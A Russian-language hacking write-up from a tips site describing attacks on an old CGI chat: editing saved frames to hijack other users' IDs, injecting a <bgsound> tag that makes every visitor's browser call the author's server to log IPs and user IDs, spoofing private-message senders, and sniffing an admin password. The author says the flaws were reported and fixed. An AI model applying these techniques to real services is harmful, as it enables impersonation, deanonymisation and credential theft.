RTFM! статьи, советы, скрипты
::Заработок с помощью сайта ::JScript по-русски! ::Все русские мануалы::
МЕНЮ
О САЙТЕ
НОВОСТИ
СТАТЬИ
КНИГИ
АППЛЕТЫ
СВЯЗЬ

СЧЕТЧИКИ
Rambler's Top100
Рейтинг@Mail.ru
Яндекс цитирования

О взломах html-чатов

Автор: Maveric Сайт: http://www.emanual.ru/     Рейтинг: N/A из 7       <<НАЗАД
   
   
   Я предполагаю, что читатель знает, что такое CGI, и на этом построю своё объяснение.
   
   Начал я с малого.
   
   В любом чате фрейм, в котором ты пишешь сообщения, генерится динамически (для каждого входящего) и, возможно, содержит несколько скрытых полей. Типа <input type=hidden name=cookie value=SP202134> (так в партизанах хранится UserID)
   
   Идея в следующем: сохраняем содержимое этого фрейма на диске и исправляем его так, что бы можно было с ним работать со своего винта. Т.е. заменяем ссылки типа /cgi-bin/refresh.pl на полный путь www.chat.nsk.su/cgi-bin/refresh.pl и вместо скрытых полей формы пишем типа <input type=text name=cookie value=SP202134> (что бы можно было их изменять) После этого делаем HTML документ для "сборки чата" из кусков. Т.е. примерно так
   
   
    "First.htm"
   <html>
   <frameset rows="80%,20%">
    <frameset cols="70%,30%">
    <frame name="razg" src=838/refresh.cgi?win+razgovor+nocookie#end">
    <frame name="rigt" src=838/right.html">
    </frameset>
   
    <frame name="bot" src=838/"start.htm">
   </frameset>
   </html>
   
   
   Start.htm - это и есть тот фрейм который я сохранил и изменил
   
   После этого я просто броузером открывал эту страницу (First.htm). И сразу(!!!) попадал в чат, минуя стандартную процедуру входа. Это позволило :
   1. Обходить зарегистрированные имена
   2. Прятать свой IP от киллеров, за счет взятия чужого ID'a
   
   Дальше мне стало интересно вычислить IP участников. Я обнаружил, что не запрещён тэг <bgsound src=838/"">. Это позволило вставлять в своё сообщение ресурс со своей машины. Сам по себе звук на хер не нужен, но этот косяк позволил вставить в свой месс строку типа <bgsound src=838/spy.exe">. Этот скрипт (spy.exe) вызывался с машины КАЖДОГО участника чата. Это позволило увидеть IP всех (скрипт просто сохранял мне на винт данные из переменной окружения REMOTE_ADDR). Это мне не очень понравилось, тк не понятно было где чей IP. Примерно в это-же время в чате появились приваты. Это значит, что документ в главном фрейме (тот где мессы все) стал называться по другому.
   
   До приватов :
   http://www.chat.nsk.su/cgi-bin/refresh.cgi?win+razgovor#end
   
   После появления приватов :
   http://www.chat.nsk.su/cgi-bin/refresh.cgi?win+razgovor+SP345678#end
   
   Где SP456789 - UserID
   
   После этого в скрипт (spy.exe) был добавлен вывод ID'a из переменной окружения HTTP_REFERER Ну а сопоставить ник с ID'ом не проблемма, тк ID каждого прописан там же примерно в такой строке
   
    <br><b><font color=yellow size=-1>Тут ник</font></b>
    <font color=black><a href="/cgi-bin/private_form.cgi?SP448188">
    <img src=838/mes.gif border=0 vspace=0></a></font>
   
   
   (Это строка взята из правого фрейма, где можно вызвать функцию "Кто в чате")
   
   После этого перестало быть проблемой сопоставление ника и IP. Затем я решил позабавиться с приватами.
   
   Используя метод сохранения странички на винт (описанный выше), я получил форму для отправления приватов от КОГО-ТО КОМУ-ТО. Т.е. я смог в отсылаемом приватно сообщении проставлять имя отправителя.
   
   Осталось только одно. Я знал, что в чате есть киллеры, но ничего не знал про то, что это, где это, как это. Знал только, что для того, чтобы киллерствовать надо зайти на какую-то страничку. Очевидно, что в этой киллерской страничке показываются имена. Я предположил, что моё имя показываются таким, каким я его ввожу. Исходя из этого, я под именем <bgsound src=838/spy.exe"> MyNick зашел в чат (через прокси), и начал легонько ругаться (мне надо было, чтобы киллеры зашли на свою страничку). После этого (когда меня убили) я разгреб лог моего ВебСервера (OmniHTTPd beta) и увидел там обращение со страници не относящейся к известным мне страницам чата. Я полез на эту страницу и получил запрос на ввод пароля, со словами "Дорогой администратор...". Это приятно согрело душу. Дальше я начал думать, то ли подобрать пароль, то ли ещё что придумать. Но ситуация так сложилась, что я оказался в одной сети с киллером, и, запустив сниффер, я поимел пароль.
   
   Ну вот и все.
   
   With best regards, Maveric.
   
   P.S. Ни один из этих приколов уже не работает в партизанах, т.к. это был "дружественный взлом" и обо всем, что я нашел, я рассказал создателю чата. Он все косяки исправил.
   
   
   


<<НАЗАД      ОЦЕНИТЬ СТАТЬЮ    ВЕРСИЯ ДЛЯ ПЕЧАТИ>>
Статья прочитана :  раз.




пейкюлю



 
 
 
 
 
pauk ©® 2000-2015. All rights reserved.
При перепечатке ссылка на сайт и указание обязательны.
Мнение администрации сайта не всегда совпадает с мнением автора.
Орфография и пунктуация - авторские.
Администрация не несет никакой ответственности за использование материалов.
.
Protected by Copyscape DMCA Takedown Notice Infringement Search Tool